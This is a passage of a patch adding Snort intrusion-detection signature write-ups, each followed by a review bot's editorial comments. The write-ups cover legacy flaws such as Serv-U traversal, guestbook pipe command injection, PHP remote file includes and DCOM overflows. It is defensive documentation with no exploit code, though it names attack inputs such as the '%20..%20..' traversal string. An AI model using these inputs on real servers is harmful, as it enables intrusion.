+Ensure that you are running a version of Apache newer than those listed 
+in the "affected systems" section.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Apache http server project
+http://httpd.apache.org/info/security_bulletin_20020620.txt
+
+--
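Review bot: Affected Systems gives the 1.3 bound as "up to and including 1.3.24" but the 2.0 bound as "up to 2.0.36", leaving it unclear whether 2.0.36 itself is vulnerable; use the same inclusive wording for both and name the fixed releases in Corrective Action instead of "a version of Apache newer than those listed". Summary and Impact are in the second person ("your web server"), unlike the rest of the set. The False Negatives note that only the BSD-targeted exploit is caught is useful; repeat in Summary that the signature matches that exploit's payload, so readers do not take it for a generic chunked-encoding detector.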
--- /dev/null
+++ b/doc/signatures/309.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 309
+
+--
+Summary:
+This event is generated when an attempt to overflow the buffer of a UNIX or Linux system via Sniffit is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Sniffit is a network monitoring tool that can also be configured to log emails. If this is the case, some versions of the tool contain a vulnerability such that a stack overflow via this logging mechanism is possible by a remote attacker.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+Use alternate tools such as Snort.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0306
+
+Bugtraq:
+http://www.securityfocus.com/bid/2353
+
+--
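Review bot: the Affected Systems section is missing (Detailed Information runs into Attack Scenarios), and Attack Scenarios ("Exploit scripts are available") is not a scenario; describe the vector, which per Detailed Information is a crafted email passing through a Sniffit instance configured to log mail, overflowing a stack buffer in the logging code. Summary ("overflow the buffer of a UNIX or Linux system via Sniffit") should say the overflow is in Sniffit itself. Typo: "compromize". Corrective Action "Use alternate tools such as Snort." is a plug rather than a fix; drop or rephrase it.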
--- /dev/null
+++ b/doc/signatures/100000755.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000755
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "features.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "features.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
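Review bot: Attack Scenarios is the credentials boilerplate and does not describe the remote file include the Summary says the rule detects; the scenario is a request to features.php with qb_path pointing at a URL on an attacker-controlled host. Additional References is empty; add the advisory. Typo: "ona web server". The Sid block lacks the blank line before "--".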
--- /dev/null
+++ b/doc/signatures/581.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+581
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) pcnfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port pcnfsd is using.  Attackers can also learn what versions of the pcnfsd protocol are accepted by pcnfsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as pcnfsd run.  The pcnfsd RPC service handles printing and authentication over the network.  A vulnerability exists because of improper argument checking that allows execution of arbitrary commands with root privileges. 
+
+--
+Affected Systems:
+BSDI BSD/OS 2.1
+HP HP-UX 10.1, 10.10, 10.20, 11.0
+IBM AIX 3.2, 4.0, 4.1, 4.2
+SCO Open Server 5.0
+SCO Unixware 2.0, 2.0.3, 2.1
+SGI IRIX 6.5, 6.5.1 - 6.5.16 
+Sun Solaris 2.4, 2.5
+Sun SunOS 4.1, 4.1.1 - 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where pcnfsd runs.  This may be a precursor to accessing pcnfsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access pcnfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for pcnfsd, not probes of the pcnfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the pcnfsd service itself. An attacker may attempt to go directly to the pcnfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/5378
+
+CERT
+http://www.cert.org/advisories/CA-1996-08.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS22
+
+
+--
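Review bot: Detailed Information describes "a vulnerability" in pcnfsd, but Additional References cites both a 1996 CERT advisory (CA-1996-08) and a 2002 Bugtraq entry (bid 5378), and the Affected Systems list (SunOS 4.1 through IRIX 6.5.16) reads like the union of both; say which issue each reference and each platform belongs to, or state that the rule is relevant to more than one pcnfsd bug. The False Negatives paragraph is good and should stay; Impact could cross-reference it so readers know the event is a portmap lookup, not a pcnfsd exploit.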
--- /dev/null
+++ b/doc/signatures/100000733.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000733
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MTBlackList.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MTBlackList.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
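Review bot: the parameter is written as "$_CONF[path]" in Summary and Detailed Information; the "$" belongs to the PHP variable, not to the query-string name an attacker sends, so state the on-the-wire form the rule matches (and whether the brackets are matched literally or URL-encoded), otherwise analysts searching logs will miss it. Attack Scenarios is the credentials boilerplate; replace it with the remote include via MTBlackList.Examine.class.php. Additional References is empty. Typo: "ona web server".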
--- /dev/null
+++ b/doc/signatures/1934.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command FOLD.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending data where a line feed character should occur to a POP server 
+via the FOLD command.
+
+The FOLD command allows the user to specify a mail folder to select.  By
+specifying a very large argument, the user can exploit the buffer overflow
+condition.
+
+--
+Affected Systems
+	POP Servers
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the FOLD function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky Macatee <ricky.macatee@sourcefire.com>
+
+--
+Additional References:
+
+--
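Review bot: the Sid does not match the file name: the file is doc/signatures/1934.txt but the Sid field reads "1936", and the documentation lookup keys on the file name, so one of the two is wrong. Also, the word "Simple." that opens Attack Scenarios belongs under Ease of Attack (where it is already stated), and "Affected Systems" is missing its trailing colon.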
--- /dev/null
+++ b/doc/signatures/360.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in Serv-U FTP from CatSoft.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+Serv-U FTP from CatSoft is an FTP server for Windows 2000, NT and 9x systems.
+
+An attacker can download and upload files on the same partition as the ftp root. The attacker can use a standard user account with write and read access to a home folder.
+
+The vulnerability appears in Catsoft Serv-U FTP Server version 2.5a-h. A Unicode support implementation error was made, which allows an attacker to submit %20..%20.. to receive a "..", which allows an attacker to traverse the directory structure of the server. 
+
+--
+Affected Systems:
+CatSoft Serv-U 2.4
+CatSoft Serv-U 2.5
+Note: CatSoft Serv-U 2.5i is not affected.
+
+--
+Attack Scenarios:
+Any standard user can break into the system root and access any file. An attacker could also guess a login and weak password, login and use the directory traversal to gain the Serv-U FTP Server's configuration file. The configuration file can be modified to give "execute" rights, uploaded using %20. directory traversal and trojans can be installed.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check FTP log files for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
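Review bot: Affected Systems lists "CatSoft Serv-U 2.4" and "CatSoft Serv-U 2.5" while Detailed Information says the flaw is in "version 2.5a-h"; the two should agree on the affected range. The traversal string is also given two ways ("%20..%20.." in Detailed Information, "%20." in Attack Scenarios); use one form. There is trailing whitespace on "Rule:  " and "-- " and a stray blank line before the final separator.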
--- /dev/null
+++ b/doc/signatures/2980.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+532
+
+--
+Summary:
+This event is generated when an attempt is made to access an administrative share on a Windows machine.
+
+--
+Impact:
+Serious. Possible administrator access on the victim machine. 
+
+--
+Detailed Information:
+This rule  generates an event when the hidden Netbios share Admin$, which is the Winnt directory, is accessed via SMB. 
+
+This is a poor security practice or an indication that a machine is being accessed remotely. 
+
+--
+Affected Systems:
+	Windows 9x
+	Windows 2000
+	Windows XP
+
+--
+Attack Scenario:
+This can be accessed from GUI "map network drive" remotely 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to disallow Netbios access from the unprotected network.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References:
+
+arachnids 340 
+
+--
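Review bot: the Sid does not match the file name: the file is doc/signatures/2980.txt but the Sid field reads "532". The last header is "References:" where every other file uses "Additional References:", and the entry "arachnids 340" is a bare identifier with no URL, unlike the other files that link the whitehats.com IDS page. Minor: "Attack Scenario:" should be "Attack Scenarios:" and "This rule  generates" has a doubled space.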
--- /dev/null
+++ b/doc/signatures/241.txt
@@ -0,0 +1,63 @@
+Rule:
+--
+Sid:
+241
+
+--
+Summary:
+This event is generated when a DDoS Shaft handler agent launchs a SYN flood against a target. 
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft agent.  If the listed destination IP is in your network, your host may be a target of a DDoS SYN flood. 
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Agents are hosts that are directed to launch attacks.  One type of attack that may be launched is a SYN flood of a target.  The SYN packets have a telltale initial sequence number of 674711609. 
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft agent may attack a target using a SYN flood. 
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+It is possible that an innocuous SYN packet will have a sequence number of 674711609.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS253
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+--
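Review bot: "launchs" in the Summary should be "launches", and the blank line between "Rule:" and the first "--" is missing, unlike the other files in this patch. The content is otherwise consistent: the initial sequence number 674711609 in Detailed Information matches the one cited under False Positives.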
--- /dev/null
+++ b/doc/signatures/2413.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2413
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
+http://www.ietf.org/rfc/rfc2407.txt
+http://www.ietf.org/rfc/rfc2408.txt
+
+IANA:
+http://www.iana.org/assignments/isakmp-registry
+
+--
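Review bot: the first two paragraphs of Detailed Information both say that ISAKMP is a framework for authentication using keys and could be merged, while the actual fault is never described: the Summary mentions "the handling of ISAKMP data and SA keys" but Attack Scenarios only says the attacker "may attempt to delete keys and security associations". Impact is the bare word "Serious" with no consequence stated. Naming is inconsistent between "Kame Racoon" in Affected Systems and "KAME IKE Daemon" in Attack Scenarios.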
--- /dev/null
+++ b/doc/signatures/100000810.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000810
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPBB" application running on a webserver. Access to the file "download.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "download.php" script used by the "PHPBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
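Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is credential-check boilerplate that does not describe a remote file include via "phpbb_root_path"; the first two paragraphs already cover the issue, so drop it. Fix "ona web server" and "attackers choosing" (the possessive is "attacker's"). The file also opens with two blank lines and lacks a blank line between the Sid value and the "--" separator.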
--- /dev/null
+++ b/doc/signatures/2732.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2732
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
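Review bot: the procedure name is cut from its sentence by a stray line break ("vulnerability in the procedure add_update_resolution" followed by ". This procedure is included in"); join the lines so the period follows the name. "Oracle Oracle9i" in Affected Systems repeats the vendor. Several headers carry trailing whitespace ("Rule: ", "Sid: ", "-- ").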
--- /dev/null
+++ b/doc/signatures/119-7.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+119-7
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects
+Unicode encoded web requests. This may be an indicator of an obfuscated
+attack against a server as well as an attempt to evade an IDS.
+
+The Unicode map for the target servers can be generated for specific
+servers. Refer to the documentation for http_inspect for instructions.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+
+--
+Attack Scenarios: 
+The attacker merely needs to encode a request using Unicode characters.
+
+--
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
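Review bot: there is a stray blank line between the "-- " separator and "Corrective Action:", unlike the other sections of this file. Affected Systems lists only "Microsoft IIS web servers." while Detailed Information says the Unicode map "can be generated for specific servers", which suggests the preprocessor event itself is not IIS-specific; clarify whether the alert or only the default map targets IIS. Several separators carry trailing whitespace.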
--- /dev/null
+++ b/doc/signatures/2211.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2211
+
+--
+Summary:
+This event is generated when an attempt is made to access guestserver.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Lars Ellingsen's Guestbook system.
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+Lars Ellingsen's Guestbook system is a CGI application for web-based guestbooks. It contains a parsing vulnerability in guestserver.cgi where an attacker can place executable code within pipe characters (|) in front of an email address in the email value of a guestbook form. Because the pipe metacharacter is not properly filtered, code placed in the email value is executed with the security context of the web server.
+
+--
+Affected Systems:
+Any web server running Lars Ellingsen's Guestbook system.
+
+--
+Attack Scenarios:
+An attacker prepends shell commands between pipe characters to an email address in the email value of a guestbook entry. When the form data is submitted, the web server attempts to execute the commands. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses guestserver.cgi on an internal web server, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Because Lars Ellingsen's guestbook system does not appear to be currently maintained, you may want to use a different guestbook application. As a workaround, you can change the 1 that appears on the line beneath <-guestbook.mailto_guest-> to 0 in the guestbook.config file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
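Review bot: the workaround in Corrective Action ("change the 1 that appears on the line beneath <-guestbook.mailto_guest-> to 0 in the guestbook.config file") does not say what that setting controls, so an operator cannot judge its side effect; state it. The False Positives note that any legitimate remote access to guestserver.cgi alerts is worth reflecting in the Summary, which currently says the event "may indicate" exploitation. Additional References is empty.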
--- /dev/null
+++ b/doc/signatures/1748.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1748
+
+--
+Summary:
+This event is generated when an attempt is made to send an overly long 
+FTP command, possibly with the intent to cause of denial of service or 
+buffer overflow in the 3CDaemon FTP server.
+
+--
+Impact:
+Attempted remote access or denial of service.  Successful execution of 
+this attack can cause a denial of service or buffer overflow, allowing 
+the execution of arbitrary commands on the vulnerable FTP server.
+
+--
+Detailed Information:
+3CDaemon is an FTP server for Windows hosts.  A buffer overflow 
+vulnerability exists in 3CDaemon revision 10.  The exploit is caused by 
+sending an FTP command that is 400 bytes or longer, causing the server 
+to crash or permitting a buffer overflow that may allow the execution of
+arbitrary commands with the privileges of the process running the FTP 
+server.  This attack does not require login access to the FTP server.
+
+--
+Affected Systems:
+
+	3Com 3CDaemon 2.0 revision 10
+
+--
+Attack Scenarios:
+An attacker may attempt to exploit this vulnerability by sending and 
+overly long FTP command, permitting the execution of arbitrary commands 
+or causing a denial of service against the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available. 
+
+--
+False Positives:
+This rule may generate an event if an FTP client provides a legitimate 
+request which is over 100 characters long. For example, when FTP clients
+store or request files with full path located in deep directory 
+hierarchies the full request might result in a filename that exceedes 95
+characters.
+
+This rule may also generate an event if Kerberos authentication is used
+for the FTP server.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4638
+
+--
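Review bot: three different length thresholds appear in this file: Detailed Information says the overflow needs "an FTP command that is 400 bytes or longer", while False Positives says a legitimate request "over 100 characters long" may alert and then that a filename that "exceedes 95 characters" may; state the rule's actual trigger length once and make the false-positive discussion match it. Typos: "sending and overly long FTP command" (an), "exceedes" (exceeds), "cause of denial of service" (cause a denial of service).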
--- /dev/null
+++ b/doc/signatures/1475.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1475
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
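Review bot: the Summary refers to "a known vulnerability in a CGI web application" without naming the application or script, so a reader cannot tell what Sid 1475 actually matches; name it. "ona web server" in Detailed Information should be "on a web server", and "attackers choosing" should be "attacker's choosing" in both Impact and Detailed Information. Additional References is empty.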
--- /dev/null
+++ b/doc/signatures/3432.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3432
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
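Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed RPC request to DCOM; the scenario should describe the RPC request. "Expoit" in Ease of Attack should be "Exploit". Additional References is empty even though Corrective Action points to vendor patches; link the vendor bulletin.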
--- /dev/null
+++ b/doc/signatures/2752.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2752
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
